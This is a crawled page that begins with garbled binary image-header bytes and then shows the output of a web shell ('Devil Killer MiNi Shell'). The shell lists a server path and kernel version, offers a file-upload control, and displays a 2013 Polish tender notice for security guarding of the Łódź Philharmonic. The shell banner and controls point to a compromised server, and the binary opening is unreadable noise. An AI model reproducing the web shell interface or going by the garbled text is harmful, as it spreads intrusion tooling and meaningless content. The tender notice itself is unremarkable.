JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131118/468916-N-2013.html

<p class="kh_header"><b>Łódź: USŁUGA CAŁODOBOWEJ OCHRONY OSÓB I MIENIA ZNAJDUJĄCYCH SIĘ W GRANICACH FILHARMONII ŁÓDZKIEJ.</b><br>
<b>Numer ogłoszenia: 468916 - 2013; data zamieszczenia: 18.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Filharmonia Łódzka im. Artura Rubinsteina , ul. Narutowicza 20/22, 90-135 Łódź, woj. łódzkie, tel. 0-42 664 79 18, faks 0-42 664 79 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.filharmonia.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA CAŁODOBOWEJ OCHRONY OSÓB I MIENIA ZNAJDUJĄCYCH SIĘ W GRANICACH FILHARMONII ŁÓDZKIEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi ochrony osób i mienia obiektu Filharmonii Łódzkiej im. Artura Rubinsteina tj.: ochrona stacjonarna: stała, bezpośrednia, świadczona 24 hna dobę przez 7 dni w tygodniu, pracująca w systemie 12 godzinnym, monitorowanie: stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzenia i systemach alarmowych, ochrona doraźna w postaci grupy interwencyjnej Wykonywanie usługi ochrony osób i mienia musi odbywać się zgodnie z WARUNKAMI I ZASADAMI SPRAWOWANIA KONTROLI oraz WYMAGANIAMI ZAMAWIAJĄCEGO I.WARUNKI I ZASADY SPRAWOWANIA KONTROLI: 1.Całodobowa ochrona obiektu, mienia, osób uprawnionych do przebywania w budynku od piwnic do VI piętra wraz z dachem oraz zewnętrznego obszaru okalającego budynek wraz z parkingiem podziemnym mająca na celu zapobieżeniu kradzieży mienia, dewastacji mienia, zagrożeniom pożarowym, klęskom żywiołowym oraz bezpośrednim zagrożeniem skutkującym utratą życia bądź pozbawienia zdrowia za pośrednictwem trzech posterunków: Posterunek stały PS Nr 1-jednoosobowy, całodobowy umiejscowiony w pomieszczeniu ochrony przy wejściu głównym dla pracowników prowadzony przez odpowiednio przeszkolonego pracownika, umundurowanego w ubiór służbowy, zaopatrzonego w imienny identyfikator ze zdjęciem i wyposażonego w środki ochrony osobistej oraz profesjonalne środki łączności, który oprócz monitorowania budynku za pomocą zainstalowanego systemu telewizji przemysłowej, w godzinach 700-2200 będzie dodatkowo pełnił funkcje informacyjne. Na posterunku stałym powinien znajdować się pracownik z licencją kierujący zmianą. Wyposażenie w profesjonalne środki łączności:środki łączności bezprzewodowej-radiotelefon-1 sztuka,latarka-1sztuka,telefon komórkowy-1 sztuka,radiostacja stacjonarna-1 sztuka,pilot antynapadowy-1 sztuka Zadania:wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obiektu, albo stwierdzenia zakłócenia porządku,niedopuszczenie do bezprawnego wyniesienia z obiektu składników majątkowych,niedopuszczenie do wejścia i wjazdu na teren obiektu osób nieuprawnionych,nie wpuszczanie na teren Filharmonii osób będących pod wpływem alkoholu,podjecie działań zmierzających do niedopuszczenia do bezprawnego zawładnięcia obiektem,podjecie niezbędnych i możliwych do wykonania czynności zmierzających do ujęcia osób stwarzających w sposób oczywisty bezpośrednie zagrożenie dla życia lub zdrowia ludzkiego, a także dla chronionego mienia w celu niezwłocznego przekazania tych osób Policji,zwracanie uwagi na przestrzeganie przepisów przeciwpożarowych,podejmowanie interwencji w stosunku do osób stwarzających zagrożenie dla bezpieczeństwa lub naruszających porządek,niezwłoczne informowanie przełożonych o zauważonych nieprawidłowościach w procedurach postępowania dotyczących bezpieczeństwa obiektu,obserwacja terenu zewnętrznego i wewnętrznego Filharmonii poprzez kamery telewizji dozorowej,nadzorowanie poprzez urządzenia wizualizacyjne pracy systemów alarmowych zainstalowanych na terenie Filharmonii, stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzenia i systemach alarmowych, istniejących w ochranianym obiekcie oraz powiadamianie o ich niewłaściwej pracy lub uszkodzeniu właściwych pracowników,których listę otrzymuje od Zamawiającego,w uzasadnionych przypadkach wzywanie GI poprzez użycie pilota antynapadowego,wydawanie kluczy do pomieszczeń biurowych, technicznych, garderób muzyków oraz sprzątaczkom wykonującym obowiązki w danych pokojach i przyjmowanie ich po zakończonej pracy oraz prowadzenie ewidencji wydawania kluczy - książka, w której musi się znajdować: numer wydawanych kluczy, data i godzina pobrania i oddania, podpis osoby pobierającej. Bez pisemnego zezwolenia nie wolno wydawać kluczy osobom niezatrudnionych w Filharmonii,dopilnowanie odnotowania przybycia i opuszczenia budynku Filharmonii przez osoby będące gośćmi w książce wejść i przekazanie identyfikatoru z napisem Gość, jednoczesne telefoniczne powiadomienie pracownika, do którego przybył gość. Osoba będąca gościem zostanie wpuszczona na teren Filharmonii po wyrażeniu zgody przez pracownika, do którego gość przybył,Otwieranie szlabanu umożliwiającego wjazd na teren parkingu pracownikom Filharmonii posiadającym identyfikatory uprawniające do wjazdu na parking o ile jest na nim miejsce i zamykanie szlabanu,gaszenie świateł na klatkach schodowych i pozostawienie oświetlenia niezbędnego, wyłączniki znajdują się na portierni,po opuszczeniu obiektu przez pracowników sprawdzenie zamknięć wszystkich pomieszczeń,prowadzenie książki z przebiegu służby z informacją pracowników ochrony, że stan ochranianej nieruchomości i parkingu nie budzi zastrzeżeń oraz opisywania szczególnych zdarzeń zaistniałych w czasie pełnienia służby. Notatka winna być podpisana przez zdającego służbę. W przypadku zaistnienia szczególnych zdarzeń należy natychmiast powiadomić Zamawiającego, wykonywanie przez pracowników pełniących służbę innych pisemnych dyspozycji Zamawiającego niezbędnych ze względu na bezpieczeństwo chronionego obiektu i nie kolidujących z charakterem służby. Posterunek doraźny PD-jednoosobowy, zlokalizowany przy wyjściu do budynku Filharmonii od strony Kina Bałtyk,prowadzony przez odpowiednio przeszkolonego pracownika,umundurowanego w ubiór służbowy, zaopatrzonego w imienny identyfikator ze zdjęciem i wyposażonego w środki ochrony osobistej oraz profesjonalne środki łączności, który od godziny 6.00 do czasu zakończenia prób orkiestry, chóru, koncertu lub wynajmu Sali będzie pełnić służbę w zakresie utrzymania porządku i bezpieczeństwa oraz kontroli czy na teren budynku nie wchodzą osoby nieuprawnione. Po zakończonym dyżurze na tym posterunku pracownik ochrony będzie pełnił funkcję dodatkowego posterunku ruchomego PR 2 Posterunek ten na polecenie kierownictwa Filharmonii może być wystawiany w miejscu wymagającym ochrony tymczasowej lub natychmiastowej a w szczególności w przypadku awarii systemu alarmowego. Wyposażenie w profesjonalne środki łączności:środki łączności bezprzewodowej-radiotelefon-1 sztuka,latarka-1sztuka,telefon komórkowy-1 sztuka,radiostacja stacjonarna-1 sztuka,pilot antynapadowy-1 sztuka Zadania: wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obiektu, albo stwierdzenia zakłócenia porządku,niedopuszczenie do bezprawnego wyniesienia z obiektu składników majątkowych,niedopuszczenie do wejścia na teren obiektu osób nieuprawnionych,nie wpuszczanie na teren Filharmonii osób będących pod wpływem alkoholu,podjecie działań zmierzających do niedopuszczenia do bezprawnego zawładnięcia obiektem,podjecie niezbędnych i możliwych do wykonania czynności zmierzających do ujęcia osób stwarzających w sposób oczywisty bezpośrednie zagrożenie dla życia lub zdrowia ludzkiego, a także dla chronionego mienia w celu niezwłocznego przekazania tych osób Policji,zwracanie uwagi na przestrzeganie przepisów przeciwpożarowych,podejmowanie interwencji w stosunku do osób stwarzających zagrożenie dla bezpieczeństwa lub naruszających porządek,niezwłoczne informowanie przełożonych o zauważonych nieprawidłowościach w procedurach postępowania dotyczących bezpieczeństwa obiektu,w uzasadnionych przypadkach wzywanie GI poprzez użycie pilota antynapadowego,gaszenie świateł na klatkach schodowych i pozostawienie oświetlenia niezbędnego, wyłączniki znajdują się na portierni,prowadzenie książki z przebiegu służby z informacją pracowników ochrony, że stan ochranianej nieruchomości i parkingu nie budzi zastrzeżeń oraz opisywania szczególnych zdarzeń zaistniałych w czasie pełnienia służby. Notatka winna być podpisana przez zdającego służbę. W przypadku zaistnienia szczególnych zdarzeń należy natychmiast powiadomić Zamawiającego,prowadzenie książki z przebiegu służby z informacją pracowników ochrony, że stan ochranianej nieruchomości i parkingu nie budzi zastrzeżeń oraz opisywania szczególnych zdarzeń zaistniałych w czasie pełnienia służby. Notatka winna być podpisana przez zdającego służbę. W przypadku zaistnienia szczególnych zdarzeń należy natychmiast powiadomić Zamawiającego,wykonywanie przez pracowników pełniących służbę innych pisemnych dyspozycji zamawiającego niezbędnych ze względu na bezpieczeństwo chronionego obiektu i nie kolidujących z charakterem służby Posterunek ruchomy PR 1 jednoosobowy prowadzony przez odpowiednio przeszkolonego, umundurowanego w ubiór służbowy, zaopatrzonego w imienny identyfikator ze zdjęciem i wyposażonego w środki ochrony osobistej oraz profesjonalne środki łączności, który patroluje całą dobę budynek wewnątrz i zewnątrz, ze szczególnym uwzględnieniem elewacji budynku i powierzchni szklanych, poprzez stałe obchody korytarzy budynku, całego budynku wraz z piwnicami i parkingiem podziemnym, patrolowanie budynku i terenu w zakresie utrzymania porządku i bezpieczeństwa oraz kontrola czy na terenie budynku nie znajdują się osoby nieuprawnione Wyposażenie w profesjonalne środki łączności:środki łączności bezprzewodowej-radiotelefon-1 sztuka,latarka-1sztuka,telefon komórkowy-1 sztuka,radiotelefon mobilny-1 sztuka,pilot antynapadowy-1 sztuka Zadania:wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obiektu, albo stwierdzenia zakłócenia porządku,niedopuszczenie do bezprawnego wyniesienia z obiektu składników majątkowych,niedopuszczenie do wejścia i wjazdu na teren obiektu osób nieuprawnionych,nie wpuszczanie na teren Filharmonii osób będących pod wpływem alkoholu,podjecie działań zmierzających do niedopuszczenia do bezprawnego zawładnięcia obiektem,podjecie niezbędnych i możliwych do wykonania czynności zmierzających do ujęcia osób stwarzających w sposób oczywisty bezpośrednie zagrożenie dla życia lub zdrowia ludzkiego, a także dla chronionego mienia w celu niezwłocznego przekazania tych osób Policji,zwracanie uwagi na przestrzeganie przepisów przeciwpożarowych,podejmowanie interwencji w stosunku do osób stwarzających zagrożenie dla bezpieczeństwa lub naruszających porządek,niezwłoczne informowanie przełożonych o zauważonych nieprawidłowościach w procedurach postępowania dotyczących bezpieczeństwa obiektu,obserwacja terenu zewnętrznego i wewnętrznego Filharmonii poprzez stały obchód obiektu od zewnątrz i w jego wnętrzu,w uzasadnionych przypadkach wzywanie GI poprzez użycie pilota antynapadowego,zamykanie i otwieranie klatek schodowych w budynku na każdym piętrze,zamykanie i otwieranie wejść głównych do budynku,zamykanie pozostawionych otwartych drzwi do Sali koncertowej, Sali kameralnej bądź innych pomieszczeń, sprawdzanie stanu zabezpieczenia poszczególnych pomieszczeń podczas obchodów oraz każdorazowe odnotowywanie spostrzeżeń z tych obchodów w książce raportów, w przypadku jakiegokolwiek zagrożenia prób kradzieży, włamania, pożaru lub tego typu zdarzeń losowych obowiązek natychmiastowe informowanie - zgodnie ze spisem telefonów umieszczonych w portierni,w przypadku jakiejkolwiek awarii elektrycznej, wodno-kanalizacyjnej itp., natychmiastowe informowanie zgodnie ze spisem telefonów umieszczonych w portierni oraz podjęcie równocześnie działania zapobiegającego powiększeniu szkody,nadzorowanie zgodnego z przepisami przeciwpożarowymi parkowania samochodów na parkingu podziemnym jak naziemnym przez pracowników Filharmonii posiadających identyfikatory uprawniające do wjazdu na parking, przekazywanie informacji do posterunku stałego o ilości wolnych miejsc,informowanie posterunku stałego o konieczności zgaszenie świateł na klatkach schodowych i pozostawienie oświetlenia niezbędnego,po opuszczeniu obiektu przez pracowników dokonuje sprawdzenia zamknięć wszystkich pomieszczeń,wykonywanie przez pracowników pełniących służbę innych pisemnych dyspozycji zamawiającego niezbędnych ze względu na bezpieczeństwo chronionego obiektu i nie kolidujących z charakterem służby. 2.Nadzór i kontrola ww. pracowników ochrony prowadzona będzie przez osobę wyznaczoną przez Wykonawcę przynajmniej dwa razy na dobę, w nie krótszym niż 8-godzinnym odstępie czasu, przy czym jedna z kontroli powinna się odbyć w porze nocnej (22.00 - 06.00). Każda z kontroli powinna być na bieżąco odnotowywana w książce z przebiegu służby. 3.Osoby nadzorujące i kontrolując pracę pracowników ochrony musi posiadać licencję pracownika ochrony fizycznej drugiego stopnia. 4.W razie wystąpienia zagrożenia chronionych osób lub mienia, pracownicy ochrony podejmują zgodne z prawem działania zmierzające do jego zminimalizowania lub ograniczenia, zatrzymania sprawcy i przekazania go policji. 5.Pracownicy pełniący służbę w chronionym obiekcie muszą mieć zapewnione wsparcie przez grupę interwencyjną wyposażoną w środki przymusu bezpośredniego w tym broń ostrą oraz środki łączności bezprzewodowej. Grupa interwencyjna przybędzie na teren chronionego obiektu w ciągu 10 minut od wezwania skierowanego do centrum operacyjnego Wykonawcy przez Zamawiającego lub pełniącego służbę pracownika ochrony. Zamawiający w tym zakresie nie dopuszcza podwykonawstwa. II.WYMAGANIA ZAMAWIAJĄCEGO 1.Strony ustalają, że Wykonawca zobowiąże pracowników skierowanych do ochrony obiektów objętych niniejszym zamówieniem do nieujawniania osobom trzecim informacji dotyczących zainstalowanych w budynkach systemów zabezpieczenia oraz wszelkich innych informacji uzyskanych w toku pełnionej służby 2.Osoba wyznaczona przez Wykonawcę do sprawowania nadzoru i kontroli nad pracownikami ochrony:............................. tel. ....................... 3.Wykonawca prowadząc ochronę obiektu Filharmonii będzie ponosił pełną odpowiedzialność za szkody powstałe w wyniku nienależytego wykonania obowiązków bądź braku odpowiedniego działania (odpowiedzialność odnosi się również do poszkodowanych osób trzecich). 4.Wykonawca zobowiązany jest do przestrzegania obowiązujących w obiekcie Filharmonii zasad postępowania w razie awarii urządzeń, pożaru lub innych zagrożeń. 5.W okresie trwania umowy Wykonawca zobowiązany jest do pisemnego zawiadamiania Zamawiającego o wszystkich istotnych okolicznościach mających wpływ na realizację umowy, a w szczególności zmianie osób upoważnionych do prowadzenia kontroli i nadzoru nad pracownikami ochrony. 6.Zamawiający wymaga, aby działania będące przedmiotem umowy były wykonywane prze pracowników sprawnych fizycznie, komunikatywnych, o wysokiej kulturze osobistej. 7.Wykonawca najpóźniej na 3 dni przed planowaną datą rozpoczęcia umowy przekaże Zamawiającemu imienną listę pozostałych pracowników ochrony, nie wskazanych w ofercie. 8.Zamawiający wymaga aby Wykonawca w okresie realizowania umowy nie dokonywał wymiany pracowników (poza przypadkami losowymi) skierowanych do ochrony poszczególnych obiektów. W przypadku zaistnienia okoliczności wymiany, nowy pracownik przed objęciem służby musi być przedstawiony kierownikowi jednostki organizacyjnej Filharmonii uprawnionej w celu zapoznania ze specyfiką pracy w obiekcie . Nie przestrzeganie tego obowiązku spowoduje niedopuszczanie pracownika do pracy. 9.Czas pracy pracowników ochrony na poszczególnych zmianach nie może przekraczać 12 godzin w ciągu doby. 10.Zamawiający zastrzega sobie prawo niedopuszczenia do pełnienia służby pracownika lub żądania w każdym czasie zmiany pracownika ochrony w każdym przypadku, bez podawania przyczyny. W takim przypadku Wykonawca jest zobowiązany do zapewnienia w ciągu dwóch godzin innego przeszkolonego pracownika. 11.Zamawiający wyjaśnia, iż pod pojęciem ubiór służbowy należy rozumieć jednolity dla wszystkich pracowników strój galowy, adekwatny do pracy w instytucji kultury, jaką jest Zamawiający. Wykonawca przedstawi Zamawiającemu wzór ubioru służbowego najpóźniej na 10 dni przed rozpoczęciem realizacji umowy. 12.Za środki ochrony osobistej o których mowa w Warunkach i zasadach sprawowania kontroli uważa się, co do zasady środki ochrony indywidualnej, które umożliwiają wykonywanie pracy w różnych warunkach atmosferycznych, tj właściwe obuwie, kurtki, osłony przeciwdeszczowe itp. III.PRAWO OPCJI W przypadku dodatkowych imprez organizowanych przez Zamawiającego Wykonawca zagwarantuje dodatkowy personel w celu wzmocnienia ochrony obiektu Filharmonii lub dodatkowy personel w celu ochrony imprez organizowanych przez Zamawiającego poza obiektem Filharmonii.Zamawiający ustala możliwość zwiększenia zakresu umowy o 5.000 dodatkowych roboczogodzin w ramach prawa opcji.W tym czasie do obowiązków Wykonawcy należeć będzie: ochrona osób bądź mienia zgodnie z określonymi przez Wykonawcę potrzebami.Wartość usługi stanowi wartość największego możliwego zakresu zamówienia z uwzględnieniem prawa opcji, a więc maksymalne wynagrodzenie, jakie może otrzymać Wykonawca z tytułu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie 3 000 (słownie: trzy tysiące) zł. Wadium może być wniesione w wybranej przez Wykonawcę formie: a/pieniądzu na rachunek bankowy 14 1030 1205 0000 0000 8790 6035 b/poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym,że poręczenie kasy jest zawsze poręczeniem pieniężnym; c/gwarancjach bankowych; d/gwarancjach ubezpieczeniowych; e/poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu PARP (Dz. U. 2007 Nr 42 poz. 275) Wadium wnosi się przed upływem terminu składania ofert. W przypadku wadium wnoszonego w pieniądzu, kwota wadium musi znajdować się na rachunku Zamawiającego przed upływem terminu składnia ofert. Wadium złożone w innej formie niż pieniężnej, należy złożyć w formie oryginału do oferty. Jeżeli Wykonawca będzie żądał zwrotu dokumentu potwierdzającego złożenie wadium, dokument ten powinien być złożony wraz z ofertą, ale nie połączony z nią w sposób trwały, który uniemożliwiałby jego zwrot bez naruszenia integralności oferty. 1) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, nr zamówienia nadany przez Zamawiającego, nazwę zamówienia; b)określenie wierzytelności, która ma być zabezpieczona gwarancją; c)kwotę gwarancji; d)termin ważności gwarancji (nie może być krótszy niż termin związania Wykonawcy złożoną przez niego ofertą); e)bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: -odmówił podpisania umowy na warunkach określonych w ofercie, lub -nie wniósł zabezpieczenia należytego wykonania umowy, lub -zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub -jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 tej ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 2) Jeżeli wadium wnoszone jest w formie poręczenia, poręczenie powinno być sporządzone zgodnie z obowiązującym prawem oraz winno zawierać następujące elementy: a)nazwę poręczyciela, nazwę wierzyciela (Zamawiający), nazwę dłużnika (Wykonawcy) na rzecz którego udzielane jest poręczenie oraz wskazanie ich siedzib, numer zamówienia nadany przez Zamawiającego, nazwę zamówienia; b)określenie wierzytelności, która ma być zabezpieczona poręczeniem; c)określenie wysokości wierzytelności objętej poręczeniem; d)termin ważności poręczenia (nie może być krótszy niż termin związania Wykonawcy złożoną przez niego ofertą); e)zobowiązanie poręczyciela do zapłacenia kwoty poręczenia na pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: -odmówił podpisana umowy na warunkach określonych w ofercie, lub -nie wniósł zabezpieczenia należytego wykonania umowy, lub -zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy lub -jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 tej ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. Zamawiający zwraca wadium niezwłocznie wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert; Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w związku z wyborem innej oferty lub unieważnieniem postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten zostanie spełniony jeśli Wykonawca wykaże iż posiada aktualną koncesję Ministra Spraw Wewnętrznych i Administracji w zakresie ochrony osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
